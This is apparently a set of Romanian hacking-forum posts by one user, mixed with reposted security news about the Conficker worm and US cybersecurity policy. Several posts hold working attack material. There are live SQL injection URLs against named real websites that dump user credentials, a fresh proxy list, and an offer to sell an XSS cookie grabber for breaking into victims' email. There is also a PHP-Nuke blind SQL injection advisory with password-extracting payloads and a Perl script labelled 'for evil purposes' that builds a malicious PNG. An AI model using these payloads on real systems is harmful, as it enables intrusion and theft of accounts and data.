paxnWo

faci la caterinca =/

versiunea e 5 : http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,unhex(hex(@@version)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- inseamna ca avem information_schema.

http://www.torrentreactor.net/rss.php?sid=-232+UNION+ALL+SELECT+1,concat(username,0x3a,passwd),3,4,5,6,7,8,9+FROM+users-- daca aveti nevoie.

[LIST=1] [*][FONT=Courier New]72.219.147.33:12095[/FONT] [*][FONT=Courier New]68.255.21.207:6763[/FONT] [*][FONT=Courier New]72.4.29.178:58941[/FONT] [*][FONT=Courier New]220.248.224.54:1080[/FONT] [*][FONT=Courier New]67.176.68.221:42233[/FONT] [*][FONT=Courier New]24.179.130.205:54045[/FONT] [*][FONT=Courier New]24.147.212.248:12859[/FONT] [*][FONT=Courier New]121.8.124.42:1080[/FONT] [*][FONT=Courier New]58.57.60.26:1080[/FONT] [*][FONT=Courier New]69.254.7.168:41333[/FONT] [*][FONT=Courier New]69.247.170.189:40323[/FONT] [*][FONT=Courier New]66.24.231.190:52015[/FONT] [*][FONT=Courier New]123.202.66.252:31013[/FONT] [*][FONT=Courier New]61.150.92.158:1080[/FONT] [*][FONT=Courier New]76.109.95.83:18519[/FONT] [*][FONT=Courier New]98.206.0.42:36299[/FONT] [*][FONT=Courier New]202.104.35.116:1080[/FONT] [*][FONT=Courier New]76.97.75.84:15765[/FONT] [*][FONT=Courier New]61.116.180.131:1080[/FONT] [*][FONT=Courier New]66.24.231.190:52015[/FONT] [*][FONT=Courier New]24.25.166.156:22367[/FONT] [*][FONT=Courier New]61.150.92.158:1080[/FONT] [*][FONT=Courier New]125.40.130.254:1080[/FONT] [*][FONT=Courier New]76.109.95.83:18519[/FONT] [*][FONT=Courier New]98.206.0.42:36299[/FONT] [*][FONT=Courier New]202.104.35.116:1080[/FONT] [*][FONT=Courier New]76.97.75.84:15765[/FONT] [*][FONT=Courier New]61.116.180.131:1080[/FONT] [*][FONT=Courier New]68.36.29.241:16941[/FONT] [*][FONT=Courier New]67.82.210.197:54519[/FONT] [*][FONT=Courier New]98.232.102.151:35819[/FONT] [*][FONT=Courier New]76.168.117.0:30878[/FONT] [*][FONT=Courier New]68.43.254.39:31985[/FONT] [*][FONT=Courier New]68.200.117.188:31850[/FONT] [*][FONT=Courier New]66.67.43.168:54475[/FONT] [*][FONT=Courier New]76.119.132.67:27989[/FONT] [*][FONT=Courier New]96.3.126.116:41393[/FONT] [*][FONT=Courier New]76.20.225.237:5949[/FONT] [*][FONT=Courier New]75.26.160.76:43799[/FONT] [*][FONT=Courier New]98.232.102.151:35819[/FONT] [/LIST] scanate acum 5 min

http://www.securitytube.net/

XSS atasat la un grabber rescris pe baza celui facut de stafful rst, cu control panel frumos. pret : 50 euro pe paypal / monebrookers / cash . stati linistiti, vi se pare o suma mare ? nu stiti cate requesturi avem ce este un cookie grabber ? http://www.rstcenter.com/forum/showthread.php?t=8934 simplu : poti sa arzi aproape pe oricine, sa le intrii in casuta de mail fara ca ei sa isi dea seama.

pai in pula mea nu am bani eu pot sa fac rost de ea , dar nu am chiar 60 de roni la mine =/ daca e bulache moubik si nu a venit atunci. venea si el, veneam si cumparam si eu. am si vorbit cu el pe mess . banii s-au dus demult pe mancare

Azi pentru prima oara am iesit si eu afara ( cu exceptia zilelor in care merg la scoala ) in ultimile 2 luni. E frumos, e cald si senin. Am pofta de fumat. Iesiti in plm afara, lasati netu.

Acum ca suntem in vacanta, noi sucarii, putem sa ne vedem sa bem un vin. Care sta in Bucuresti sau pe langa, sambata pe la orele 14:00 la Piata Unirii, in fata Magazinului Unirea, la intrarea de la Mec Donalt, urlati si o sa ne recunoastem. Am vorbit cu cativa si cica or sa vina. So , care veniti ? ps : promit ca nu o sa ma ating de voi =]

1. frumos pentru incepatori. 2. de ce ai postat la sectiunea asta ?

Un script gen pastebin cu link pe homepage. f folositor

http://paxnwo.hi5.com

http://www.1-time.org/ cautam demult asa ceva =] e destul de folositor

Facilitati: Scaneaza site'ul de LFI , RFI si Path Disclosure. Poti sa iti setezi User-Agent'ul si Referer'ul. Instalare: Uploadati fisierele acestea pe un host care suporta PHP si cURL. Accesati index.php . Mod de utilizare: Copiati un link de forma http://site.com/index.php?= in fieldul "Targhet" si dati "Schean !". Demo: http://www.testeweb.com/rst/php_scanner_by_PaxNwo/ --------------------------------------------------------------------------------------- JavaScript'ul nu este facut de mine. Google helped =] La PHP nea Google a ajutat inca o data. Ideea si proiectul in sine ii apartin lui RoMeO. Eu l-am rescris, l-am adaptat si l-am fixat. In viitor probabil o sa fac suport de proxy. Nu e ceva stralucit, dar mi-a placut sa lucrez la el.

SQL Injection Permissions, Privileges, and Access Control 2008 a fost un an bogat

Security watchers are bracing themselves to respond to the activitation of the huge botnet created by the Conficker superworm. The malware has created a network of infected PCs under its control estimated at 9m or even more, according to the latest estimates — dwarfing the zombie army created by the infamous Storm worm, which reached a comparatively paltry 1m at its peak in September 2007. Variants of Conficker (aka Downadup), which began circulating in late November, exploit the MS08-067 vulnerability in the Microsoft Windows server service addressed by Redmond with an out-of-sequence patch last October. The malware also infects removable devices and network shares using a special autorun file. The worm uses social engineering trickery so that users on Windows machines looking to simply browse the contents of a memory stick may be tricked into selecting an option that actually runs a malware payload and infects their PC. Some variants are programmed to spread across machines in the same local area network. Weak passwords in corporates have therefore aided the distribution of the worm. The multiple infections techniques - none of which, incidentally, feature email — has fuelled the prolific spread of the worm. It’s been years since any worm has spread so widely. In many ways the Conficker worm epidemic represents a return to the bad old days of worms such as Nimda, Blaster and Sasser. It only takes one rotten apple In the case of Conficker, security watchers reckon the fact that the worm only needs to hit one infected machine in a network to spread goes a long way towards explaining its success. Slow patching, particularly in corporates, has also contributed to the epidemic. “We haven’t seen this type of advanced worm in many years,” Eric Schultze, CTO of patching firm Shavlik Technologies told El Reg. “It’s successful because once a single machine is infected in a corporate environment, it can spread itself to all of the other corporate machines, whether they’ve been patched or not. “In terms of damage it can do, some reports say the worm is a dud but I believe that it’s simply ‘sleeping’ and may be woken up at a future date to execute some set of evil instructions. Even if never executed, the worm turns off the windows update service and blocks access to many security vendor websites [blocking uptake of new antivirus signatures]. “To many, these actions alone may be considered malicious.” Net security firm Sophos reckons that business users have been harder hit than consumers by the spread of the worm. The malware has caught some firms on the hop because they haven’t rolled out patches, it figures. Superworms return Theories on why we haven’t seen a worm of this type for three or four years are thin on the ground. It may be that writing such a worm (even if it pinches parts of its code from Metasploit, the open-source penetration testing tool) is simply too much like hard work. “It’s more effort to write malware that exploits a new vulnerability than, say, regular executable malware that is emailed or shoved on web,” said Graham Cluley, senior technology consultant at anti-virus firm Sophos. “If email or web attacks work just fine, then why go to extra effort?” “These guys aren’t doing it for intellectual challenge or showing-off. Money is the motive.” Despite the noteable lack of network worms over recent years the approach — much like spreading computer viruses using infected email attachments — has always been an option for miscreants. “Hackers never completely abandon old tricks,” Cluley continued. “They can always dust them off and use them again. For example, there was a huge increase is infected email attachments last year year. It’s a danger to think we have any particular attack strategy licked.” Cluley, like other security researchers, credited Microsoft for releasing a clean-up tool in January after publishing a patch in October, while noting the software giant bears significant responsibility for creating the security vulnerability that allowed the worm to spread in the first place.

Security Subscription #23.01.2009 #3: ############# #### PHP-Nuke 8.0 Downloads Blind Sql Injection #### ######################################################################## ############# # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : http://ircrash.com # #My Official WebSite : http://r3dw0rm.ir # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # ######################################################################## ############# # # #Download : http://phpnuke.org # # # #Dork : inurl:modules.php?name=Downloads "PHP-Nuke" # # # ######################################################################## ############# # [Bug] # # # #Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&descrip tion=1&email=attacker (at) devil (dot) net [email concealed]&&url=0%2F*%00*/'%20OR%20ascii(substring( (select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F* #Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&descrip tion=1&email=attacker (at) devil (dot) net [email concealed]&&url=0%2F*%00*/'%20OR%20ascii(substring( (select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F* #Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&descrip tion=1&email=attacker (at) devil (dot) net [email concealed]&&url=0%2F*%00*/'%20OR%20ascii(substring( (select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F* #Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&descrip tion=1&email=attacker (at) devil (dot) net [email concealed]&&url=0%2F*%00*/'%20OR%20ascii(substring( (select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F * # # ######################################################################## ############# # [Note] # # # #1. magic_quotes_gpc = Off # #2. register_globals = On # #3. For using bug you must login via a simple user. # #4. After using bug go to this url : # #http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker @devil.net&title=zz&url=zz&description=zz #5. I use ascii codes and null byte in url for bypass nuke security function # # please don't change ascii code and %00. # # # ###################################### TNX GOD ############################################################################################################## #2: In the homeland security document, [URL="http://www.whitehouse.gov/agenda/homeland_security/"]published on Thursday[/URL], the administration pledged to create a top cybersecurity position, harden the nation's infrastructure, fund research and development of secure computing technologies, and work with the private sector to set standards from cybersecurity. The document also promised that the administration will work with industry to develop better defenses against cyber espionage, shut down the mechanisms through which online criminals profit from their crimes, and mandate better privacy and breach disclosures. The Obama administration will "declare the cyber infrastructure a strategic asset and establish the position of national cyber advisor who will report directly to the president and will be responsible for coordinating federal agency efforts and development of national cyber policy," the document stated. Much of the strategy mirrors the recommendations sent to the administration by a group of industry, government and academic experts in cybersecurity. The [URL="http://www.securityfocus.com/news/11540"]94-page report on those recommendations[/URL], penned by the Commission on Cybersecurity for the 44th Presidency, stressed that the current U.S. administration needs to treat incursions into the nation's networks as a serious problem, akin to nuclear non-proliferation and combatting terrorism. Indeed, the homeland security document puts cybersecurity as the fourth priority for the administration's security strategy, behind fighting terrorism, limiting the spread of nuclear weapon and preventing bio-weapon attacks and epidemics. Only late in the previous administration, under former President George W. Bush, did the government make progress in establishing better security for government systems. Years of poor grades under the Federal Information Security Management Act (FISMA) [URL="http://www.securityfocus.com/brief/741"]did little to improve[/URL] information-technology security within federal agencies. Not until major attacks on government networks [URL="http://www.securityfocus.com/news/11472"]resulted in congressional hearings[/URL] did the administration take point on efforts to lock down computers. In 2007, the Bush Administration [URL="http://www.securityfocus.com/news/11505"]launched[/URL] the Federal Desktop Core Configuration program and the Trusted Internet Connection initiative, and last year, President Bush signed the National Security Presidential Directive 54/Homeland Security Presidential Directive 23 [URL="http://www.securityfocus.com/news/11507"]creating the Comprehensive National Cybersecurity Initiative (CNCI)[/URL]. With the push for better cybersecurity, President Obama made good on campaign promises made last summer. "As President, I'll make cyber security the top priority that it should be in the 21st century," he told people in West Lafayette, Ind., [URL="http://www.barackobama.com/2008/07/16/remarks_of_senator_barack_obam_95.php"]according to a transcript[/URL]. "I'll declare our cyber-infrastructure a strategic asset, and appoint a National Cyber Advisor who will report directly to me. We'll coordinate efforts across the federal government, implement a truly national cyber-security policy, and tighten standards to secure information — from the networks that power the federal government, to the networks that you use in your personal lives."Two days into his administration, U.S. President Barack Obama issued a statement outlining his homeland security policy, including the creation of a top advisor in the White House to set cybersecurity policy.#1: Date : January 23, 2009 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote attackers to inject arbitrary web script or HTML by using db script parameter when register_global php parameter is enabled (CVE-2008-4775). Cross-site request forgery (CSRF) vulnerability in tbl_structure.php allows remote attackers perform SQL injection and execute arbitrary code by using table script parameter (CVE-2008-5621). Multiple cross-site request forgery (CSRF) vulnerabilities in allows remote attackers perform SQL injection by using unknown vectors related to table script parameter (CVE-2008-5622). Package : phpMyAdminO sa imi updatez constant postul sa adaug noi informatii. Nu postati dupa mine, doar daca simtiti nevoia.

BigMaster, nu o sa isi bata nimeni capul cu ideea ta. daca vrei, fa forword la rstcenter.ro catre rstcenter.org

Have any ? in afara de milw0rm si slashdot.

#made by HybriD for evil purposes #works on all internet explorers and all windows service packs my $payload = "\x50\x4e\x47\x0d\x0a\x5c\x78\x4f\x41\x1a\x5c\x78\x4f\x41\x26\x23". "\x36\x35\x35\x33\x33\x3b\x26\x23\x36\x35\x35\x33\x33\x3b\x26\x23". "\x36\x35\x35\x33\x33\x3b\x5c\x78\x4f\x44\x50\x48\x43\x4b\x26\x23". "\x36\x35\x61\x33\x33\x3b\x26". "\x23\x36\x35\x35\x33\x33\x3b\x26\x23\x36\x35\x35\x33\x33\x3b\x01". "\x26\x23\x36\x35\x35\x33\x33\x3b\x26\x23\x36\x35\x35\x33\x33\x3b". "\x26\x23\x36\x35\x35\x33\x33\x3b\x01"; my $code = "code here"; open(file,'>>xss.PNG'); print file $payload; print file $code; close(file); dati replace la code here cu codul vostru html/javscript/perl/php. apoi perl filenamehere.pl

imi citesc mailurile, forumurile si site-urile pe care le frecventez , dota , scoala , dota , imi citesc mailurile, forumurile si site-urile pe care le frecventez , somn

asta am gasit pe google , nu cred ca a fost postata pe forum . http://erste-homepage.com/articles/3/serverumzug pwnd by the one and only *mwd* [ greetz: paxnWo ] @ RST wtf ?

We're back !

sunt restrans in privinta comentariilor pe tema acestor documentare. poate fi manipulare dar poate sa fie si adevar. abia atunci cand te documentezi bine si esti bazat, tragi linie sa iti ordonezi ideile. le-am vazut.